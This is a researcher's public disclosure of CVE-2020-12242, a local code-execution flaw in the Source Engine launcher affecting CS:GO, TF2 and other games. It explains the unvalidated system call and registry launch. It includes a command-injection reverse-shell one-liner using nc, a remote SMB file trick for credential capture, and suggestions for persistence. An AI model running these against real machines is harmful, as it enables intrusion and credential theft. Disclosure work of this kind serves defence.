Post

Source Engine LPE/Arbitrary Code Execution; CVE-2020-12242

Code Execution within Source Engine Game


CVE: CVE-2020-12242


Affected Products


Tested:

CS:GO BuildID: 4937372 -> Current

TF2 BuildID: 4871679 -> Current

Garry’s Mod BuildID: 4803834 -> Current

Half Life 2 BuildID: 4233302 - > Current

Note: this vulnerability seems to date back further then the listed build numbers, however i have only tested back to them

Notes:

This seems to be a issue within the source engine itself and should be present within all source games. However I have only tested the games listed above.


Vulnerability Explanation in Short

TL;DR Within MacOS place ";nc -e /bin/bash ip port"(or whatever you want for shell) into /tmp/hl2_relaunch, open and close CS:GO and you have a shell on MacOS as whoever runs the game. On Windows add a registry key named Relaunch URL to Computer\HKEY_CURRENT_USER\Software\Valve\Source, however we can only call programs, thankfully we can use SMB/Any UNC Path to call a remote file(and get creds while were at it), so set it to \\ip\share\file and boom

More Technical Explanation

Within The CS:GO Source code leak, you can find the affected file at launcher/launcher.cpp Lines 1939 -> 1974 are the affected functions. See screenshot of code above.

However on line 98, the file is defined for OSX

OSX File Selection

On OSX, the launcher checks to see if the file ‘/tmp/hl2_relaunch’ exists, if it does then it creates the szCMD variable. If the file has stuff within it(it 99.9% of the time will), then it will add ‘open’ too the start and send it out as a system call. The issue with this is that their is no input validation. Meaning as I showed before, we can just add ; and it’ll execute anything we wish after.

For Windows, it checks to see if the registry key HKEY_Current_User\Software\Valve\Source, exists, then if it does if ReLaunch URL Exists within it, if it does call the ShellExecute Open function with the value of the registry key(Docs for shell execute here), this means itll run a executable, or open the attached program. and since the values “0, 0” are set we are unable to add parameters. However we are able to specify a remote SMB Path, so if we set the registry key to a SMB server we control containing a malicious file (I tested with a .bat running a rev shell command), using this method we can also fetch users credentials.

Closing Notes


This issues was reported to Valve on 22/04/2020 via HackerOne and denied due to

Which, I find very confusing, since that line of the scope was taken from the following

Which states RCE Must follow those 3 statements, not a LPE, or a Local Arbitrary Code Execution(depends on how you classify the bug). While I do see that this bug would have a low broader impact, in certain scenarios it could have a more serious impacts. As a example a dev could self-host a web server on their machine and it could be compromised, this bug would allow them to place the file in /tmp as www-data and get a shell as the user who plays CS:GO(or any source game) next, or this could also be used as a way to maintain access to a box. Set the file in the tmp and if you lose the shell just wait for them to play CS:GO(or any source game). Anyways, that is why this is being disclosed this way instead of via Hackerone.

As a additional note this was a collaborative effort between Me(0xEmma), BugByt3 and sebastianpc.

This post is licensed under CC BY 4.0 by the author.